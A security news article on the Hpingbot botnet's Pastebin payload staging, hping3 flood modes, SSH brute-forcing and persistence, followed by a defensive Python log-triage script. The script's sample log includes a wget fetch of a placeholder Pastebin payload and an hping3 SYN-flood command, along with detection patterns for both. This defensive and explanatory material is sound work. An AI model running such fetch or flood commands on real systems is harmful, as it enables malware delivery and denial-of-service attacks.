NSFOCUS Fuying Lab uncovered a rapidly evolving botnet family named Hpingbot. Written in Go and targeting both Windows and Linux/IoT environments, Hpingbot showcases cross-platform efficiency, modular design, and stealth-focused tactics—all characteristics that indicate the presence of a highly capable development team behind it.
“This is a new botnet family built from scratch, showing strong innovation capabilities and efficiency in using existing resources,” states the NSFOCUS report.
Rather than relying on complex infrastructure, Hpingbot smartly leverages public platforms and tools. It uses Pastebin—a public text-sharing site—as a payload distribution hub and the hping3 network testing tool to carry out DDoS attacks.
“The use of Pastebin and hping3 not only improves stealth but also significantly reduces development and operating costs,” the researchers note.
Interestingly, the Windows version of Hpingbot cannot use hping3, yet remains highly active. This leads analysts to believe its primary utility lies in downloading and executing arbitrary payloads, potentially acting as a distribution vector for more dangerous malware.
Despite being capable of DDoS attacks, Hpingbot remains largely dormant in that respect. Since June 17, only a few hundred attacks have been recorded, mainly targeting Germany, the US, and Turkey. The botnet instead appears focused on silently establishing persistence and preparing infrastructure for future malware distribution.
“The frequency of DDoS attacks launched by hpingbot is low, and most of the time it is silent, which also shows that DDoS is not its only purpose,” NSFOCUS emphasizes.
The report draws attention to a curious case: IP address 79.*.*.212, running the NetData monitoring service on port 19999, was attacked over 15,000 times by six different botnet families, including Hpingbot.
“The new botnet may use this method to test the DDoS attack capabilities of its newly developed DDoS module in actual attack activities.”

Hpingbot employs a split propagation strategy, keeping its SSH brute-force module separate from the core sample. This helps protect its propagation techniques and restrict spread to specific targets. Its primary infection method is weak SSH credentials.
Once installed, it maintains persistence via Systemd, SysVinit, and Cron scripts, while clearing command history and deleting its own files to avoid detection.
For systems that support hping3, Hpingbot offers a dozen DDoS attack modes via plaintext commands such as:
- syn (SYN Flood)
- ack, psh, fin-ack (TCP ACK/PSH/FIN Floods)
- udp (UDP Flood)
- botox, fsrpau (Mixed Mode Floods)
Each attack command is executed with hping3 using specified parameters (IP, port, duration, etc.), allowing custom packet floods tailored to each target.
One of the most concerning characteristics of Hpingbot is its breakneck development pace:
- Over 10 script iterations in two weeks.
- Frequent updates to Pastebin links and payloads.
- Switching C2 servers at least three times, showing strong anti-detection awareness.
- Enhanced support for apt, yum, and pacman for better environment compatibility.
“The attackers are continuously optimizing the content they put on the Pastebin platform and the corresponding download and installation scripts… showing the potential intention of operating this malware family for a long time.”
While still in its early stages, Hpingbot is not to be underestimated. Its architecture, modularity, and aggressive update cycles point to a botnet built for longevity and adaptability, potentially serving as a staging platform for ransomware, APT components, or data theft tools.
“There is a risk of distributing more dangerous payloads… Its rapid rate of improvement suggests that there may be a professional development team behind it.”
Security teams are advised to monitor SSH traffic for brute-force attempts, restrict access, and track known Pastebin and hping3 usage patterns.
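The monitoring advice above, expressed as log triage in Python. This is an added example, not code from the NSFOCUS report or this article: it flags a password login that follows repeated SSH failures from the same source, Pastebin retrievals by `curl`/`wget`, and any command line naming `hping3`. The log lines are constructed, the `EXEC user=... cmd=...` record format is a hypothetical simplification of process-execution telemetry, and the threshold of three failures is an assumption.

```python
import re
from collections import Counter

# Constructed sample: OpenSSH auth lines plus a simplified, hypothetical
# "EXEC user=... cmd=..." process-execution format (not a real tool's output).
SAMPLE_LOG = """\
sshd[811]: Failed password for root from 203.0.113.7 port 40112 ssh2
sshd[811]: Failed password for root from 203.0.113.7 port 40114 ssh2
sshd[811]: Failed password for invalid user admin from 203.0.113.7 port 40120 ssh2
sshd[812]: Failed password for root from 198.51.100.9 port 51000 ssh2
sshd[813]: Accepted password for root from 203.0.113.7 port 40130 ssh2
EXEC user=root cmd=wget -qO- https://pastebin.com/raw/EXAMPLEID
EXEC user=root cmd=apt-get install -y hping3
EXEC user=root cmd=hping3 -S --flood -p 80 192.0.2.50
EXEC user=alice cmd=ls -la /tmp
""".splitlines()

FAILED = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?\S+ from (\S+) port")
ACCEPTED = re.compile(r"sshd\[\d+\]: Accepted password for (\S+) from (\S+) port")
EXEC = re.compile(r"EXEC user=(\S+) cmd=(.+)")
PASTEBIN = re.compile(r"\b(?:curl|wget)\b.*pastebin\.com/", re.I)
HPING = re.compile(r"(?:^|[\s/])hping3(?:\s|$)")

def detect(lines, fail_threshold=3):
    """Return findings for the three behaviours the article tells defenders to watch."""
    failures = Counter()
    findings = {"bruteforce_success": [], "pastebin_fetch": [], "hping3": []}
    for line in lines:
        if m := FAILED.search(line):
            failures[m.group(1)] += 1
        elif m := ACCEPTED.search(line):
            user, ip = m.groups()
            # A password login after repeated failures from the same source
            # suggests a weak credential was guessed.
            if failures[ip] >= fail_threshold:
                findings["bruteforce_success"].append((ip, user, failures[ip]))
        elif m := EXEC.search(line):
            cmd = m.group(2)
            if PASTEBIN.search(cmd):
                findings["pastebin_fetch"].append(cmd)
            # Flags any command that names the hping3 binary, installs included.
            if HPING.search(cmd):
                findings["hping3"].append(cmd)
    return findings

if __name__ == "__main__":
    for kind, hits in detect(SAMPLE_LOG).items():
        print(kind, hits)
```

On a real host the `EXEC` records would come from whatever process-execution source is deployed, with the regular expression adjusted to that format.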